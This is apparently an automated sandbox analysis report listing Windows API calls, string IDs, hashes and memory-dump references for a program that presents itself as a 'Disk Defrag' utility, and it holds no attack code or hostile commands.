                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$DefragFinishRingtone$DiskDefrag\Setting Option\Gereral
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-840960858
                                                                                                                                                                                                                                                                                    • Opcode ID: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                    • Instruction ID: 0a2994e761213e214e5a4d6a869241ea1e3b325438042f93d97e0811baed8686
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41717074820566EA30B7725D23BAF21489F1CB98F00562FFA19953C2FBEDD885859F
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 004222D6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 00422367
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00422400
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 447f9f9946ccff9b1b99764a0f42122032f9790cb51c1b014e12d9a983ad3545
                                                                                                                                                                                                                                                                                    • Instruction ID: 003c1d75d670e48058873593885aa4881fdd5922b449336556b7ec6c7a2bda3d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 447f9f9946ccff9b1b99764a0f42122032f9790cb51c1b014e12d9a983ad3545
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43418071604311AFC710EF29E880AABB7E4FF88314F444A2EF959DB241D778A944CB95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401129,?,0047D9D0,0047D9D0,0047D9D0), ref: 004259D2
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401130,0047D9D0,0047D9D0,0047D9D0,0047D9D0,?,?,?,?,?,?,?,?,?,?), ref: 00425A0B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401129$3401130
                                                                                                                                                                                                                                                                                    • API String ID: 0-1376210773
                                                                                                                                                                                                                                                                                    • Opcode ID: f75ec2c0ac9a0af7f618d4b75ecfcfa7dd7948d3cf15e991352d6c15fd79f6bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 290a2bb6d7e4a4517d003926c088f46f9fe0c42f71943b9fab805552d124ffae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f75ec2c0ac9a0af7f618d4b75ecfcfa7dd7948d3cf15e991352d6c15fd79f6bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1141D8B1A04701AFC314EF54DD82F9BB7A8EF84714F104A2FFD5997281D778A8098799
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004619BD
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Disk Defrag,00040010), ref: 004619FE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastMessage
                                                                                                                                                                                                                                                                                    • String ID: %c:\$Disk Defrag
                                                                                                                                                                                                                                                                                    • API String ID: 463093485-3222931339
                                                                                                                                                                                                                                                                                    • Opcode ID: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                    • Instruction ID: 731faf273718486ffcde032920aca0e1f319cedce5eb76f7311323341e126d0a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E64195712087419FC324DF25D845B6BB7E4EF84715F044A2EF599C7290EB74A808CB9B
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,00000000), ref: 0042EC76
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000001,00000000), ref: 0042ECA3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042ECDA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongNamePath$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3461188054-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 02b7588f572fd549226da487b941490f7314d4176d4851207869953aa2da4a66
                                                                                                                                                                                                                                                                                    • Instruction ID: 9fdf5df9b511b0c67cbd5e6567facad5020a46183586509d2c0c406cb078a0d1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b7588f572fd549226da487b941490f7314d4176d4851207869953aa2da4a66
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41F231208301AFD321DF20DD86FABB7A8EF58710F50062DF559961E0DBB4A949CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,?), ref: 00410C49
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%HOMEDRIVE%,?,0000000C), ref: 00410C8F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandInformationStringsVolume
                                                                                                                                                                                                                                                                                    • String ID: %HOMEDRIVE%$NTFS
                                                                                                                                                                                                                                                                                    • API String ID: 1751349637-3402063299
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00432180: SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00432180: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,?,00000000), ref: 00432160
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$DiskDefrag\Setting Option\Optimize$cbbFileSize
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3449206993
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,0000008F), ref: 004020B8
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,0000008E), ref: 004020D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402140: SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402A30: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402A30: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00402121
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BitmapLoad$FileInfo
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 945603440-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,?,?,?,?,?,?,004619AE), ref: 004629EC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                                                                                                                    • String ID: FAT$FAT16$FAT32
                                                                                                                                                                                                                                                                                    • API String ID: 2039140958-3969911809
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                    • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                    • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetRectEmpty.USER32(0000000C), ref: 0040DE94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EmptyRect
                                                                                                                                                                                                                                                                                    • String ID: Button$CDoubleDraw$Default
                                                                                                                                                                                                                                                                                    • API String ID: 2270935405-580154339
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402044$8F$CPUIdleTime
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-857541521
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00424CBC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ForegroundWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3090259878-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                    • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402045$8F$CPUUsageExceed
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3685332712
                                                                                                                                                                                                                                                                                    • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                    • mciGetErrorStringW.WINMM(00000000,?,00000080,00000001,00000001,?), ref: 0041E23D
                                                                                                                                                                                                                                                                                    • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                    • String ID: %s/n
                                                                                                                                                                                                                                                                                    • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                    • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                    • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                    • String ID: >=
                                                                                                                                                                                                                                                                                    • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                    • #354.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$#354FileSystem
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                    • API String ID: 253409978-3598614746
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CF9B
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042CFF6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRedrawSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1030633669-2789391384
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _TrackMouseEvent.COMCTL32(?), ref: 004672A8
                                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 004672BA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004672CD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CaptureEventMessageMouseReleaseSendTrack
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3622949717-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00418A33
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00418A3F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002727,00000000,00000000), ref: 00418A57
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Parent$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 2251359880-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 0627b2b28fd14ab22fc302f47fdf8d037d2ddcb8f263ad73e8dfdf44008453ba
                                                                                                                                                                                                                                                                                    • Instruction ID: e214ceb953b926337bbb5e3aa2410105eb18bd81ccfae75be166400476811563
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0627b2b28fd14ab22fc302f47fdf8d037d2ddcb8f263ad73e8dfdf44008453ba
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF03AB9504210AFC300EB64DD89E5BBBA8FF98710F04CA5EF58C9B241D674E845CFA2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                    • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415319,?,?,BB40E64E,?,?,00000000,BB40E64E,?,BB40E64E,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-158344479
